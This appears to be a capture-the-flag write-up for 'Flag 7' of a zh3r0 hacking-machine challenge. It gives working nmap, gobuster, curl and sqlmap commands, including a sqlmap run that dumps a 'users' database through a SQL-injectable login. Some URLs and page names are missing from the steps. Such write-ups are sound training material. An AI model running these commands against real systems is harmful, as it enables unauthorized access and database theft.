Flag 7
by shreyas-sriram
Subset of subset of hacking machines challenges
Flag 7
We are given a URL - hackit.zh3r0.ml
Optional: Find IP address of the given domain using ping
Since it is a machine, begin with a full port scan
nmap -T4 -sC -sV -p- hackit.zh3r0.ml
Note: Not sure if I used the right [options], run
nmap --help
for better understanding and optimisation
This reveals all the open ports and services running on each port. Also notice that the services running are all mixed up.
22/tcp open http
25/tcp filtered smtp
99/tcp open ssh
324/tcp open ftp
4994/tcp open unknown
11211/tcp filtered memcache
- Since
is running on port22
, it will be restricted by the browser and we will not be able to access it directly. There are two ways around this problem.- Allow restricted ports in Firefox Browser
- Go to
in Firefox address bar - Add a string with name and value as
name : network.security.ports.banned.override value : 22
- Access
- Go to
- Access the webpage through cURL or wget
curl http://hackit.zh3r0.ml:22/robots.txt
wget http://hackit.zh3r0.ml:22/robots.txt
- Allow restricted ports in Firefox Browser
- There is a clue which has something to do with ads. There are two ways to go about this.
- Make a guess to visit
- Obtain a string encoded in
Base 62
(Damn, these aren’t the bases I am aware of :tired_face:) - Use https://gchq.github.io/CyberChef/ to decode and get another webpage
- This page contains a login
- Obtain a string encoded in
- Use directory busting tools on
gobuster dir -u http://hackit.zh3r0.ml:22/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
- GUI tool- This also reveals
without getting toads.txt
- Make a guess to visit
- The login in page
seems to be vulnerable to SQL Injection, we can exploit it usingsqlmap
- To retrieve databases, use the command
sqlmap -u --data="username=f4k3&password=fl4g" --method POST --dbs --batch
- There are 4 databases, of which users seems interesting
- To retrieve all information about a database, use the command
sqlmap -u --data="username=f4k3&password=fl4g" --method POST -D users --dump all --batch
- This gets us Flag 7
Note: sqlmap takes quite sometime, so grab a snack while you watch the flag unfold :cookie:
- To retrieve databases, use the command